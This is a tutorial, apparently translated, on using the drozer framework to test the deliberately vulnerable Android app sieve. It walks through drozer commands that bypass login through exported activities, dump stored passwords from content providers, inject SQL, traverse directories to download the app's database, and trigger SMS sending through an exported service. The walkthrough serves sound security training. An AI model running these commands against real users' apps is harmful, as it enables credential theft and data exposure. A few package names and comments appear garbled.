table of Contents
- drozer download
- drozer installation
- sieve (drozer test program)
- drozer use
-
- Establish a connection between the mobile phone and the PC
- Determine the attack surface
- Test activities exported (easy to bypass login verification)
- Test content provider (easy to cause database leaks, SQL injection, etc.)
- Use exposed content provider for SQL injection
- Get information from File System-backed Content Providers
- Test services exported (privilege escalation)
- Test broadcast receivers exported (denial of service)
drozer download
Download link: drozer
drozer installation
Download the software and decompress it, enter the decompression directory and click setup.exe, follow the prompts to complete the installation, and install it on the C drive by default;
transfer agent.apk to the phone and install it.
sieve (drozer test program)
Download link: sieve
introduction: sieve is a small password management software that contains common Android application vulnerabilities and can be used as a test object for drozer practice.
Usage: When sieve is started for the first time, it requires the user to set a 16-character "master password" and a 4-digit pin to protect the password that the user will enter later. Users can use sieve to store passwords for various services, and if they need correct credentials, they can retrieve these passwords in later data.
drozer use
Establish a connection between the mobile phone and the PC
1. Open drozer agent on the mobile phone and open Embedded Server.
2. The PC side sets the forwarding port through ADB.
3. Enter the drozer installation directory under dos on the PC side, execute the command, and successfully establish a connection with the drozer agent on the mobile phone.
Precautions
If an error "could not find java..."
is reported, create a file named .drozer_config and add the following content to the file:
[executables]
java=D:\Java\jdk1.7.0_65\bin\java.exe
javac=D:\Java\ jdk1.7.0_65\bin\javac.exe
is the path of java and javac, save it and store it in the C:\Users\XXX\ directory, where XXX is the current user name directory, and then reconnect successfully
Determine the attack surface
dz> run app.package.list //List all installed application package names
dz> run app.package.list -f sieve //Search for a specific package name
dz> run app.package.info -a com.mwr. example.sieve //View application information
dz> run app.package.attacksurface com.mwr.example.sieve //Identify the attack surface
Test activities exported (easy to bypass login verification)
dz> run app.activity.info -a com.mwr.example.sieve //Display exposed Activity information
dz> run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList //This command will generate a suitable intent to start the activity
mobile phone to view the sieve software, no login verification is required , You can enter the system.
Test content provider (easy to cause database leaks, SQL injection, etc.)
dz> run app.provider.info -a com.mwr.example.sieve //List Content Provider information
dz> run app.provider.finduri com.mwr.example.sieve //枚举uri
dz> run scanner.provider.finduris -a com.mwr.example.sieve //Use the scanner to enumerate uri
dz> run scanner.provider.injection -a com.mwr.example.sieve //Detect available uri, check SQL injection
Now you can use other drozer modules to retrieve information from these content URIs and even modify data in the database
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ //Get database data (that is, the previously saved password and email information)
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Keys/ --vertical //Display database data vertically
Use exposed content provider for SQL injection
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Keys/ --projection "'" //The database returns error information, and the sql query statement, and then constructs it to query what you want Database information to be obtained
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Keys/ --selection “’”
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM SQLITE_MASTER WHERE type='table';-- "//Use Sql to inject and list the database All data sheets
Get information from File System-backed Content Providers
dz> run scanner.provider.traversal -a com.mwr.example.sieve //Detect directory traversal
dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts //Traverse the directory
dz> run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sieve/database/database.db /home/user/database.db to download the specified file Go to the specified directory (it is not recommended to specify the directory under windows, because there will be problems, go directly to the main directory of drozer)
Test services exported (privilege escalation)
run app.service.info -a com.android.nsf //Get service details
run app.service.send com.adnroid.nsf com.igexin.sdk.PushServiceUser --msg 1 2 3 //访
run app.service.start --action com.test.vulnerability.SEND_SMS --extra string dest 11111 --extra string text 1111 --extra string OP SEND_SMS
Test broadcast receivers exported (denial of service)
run app.broadcast.info -a com.android.nsf //Get broadcast receivers information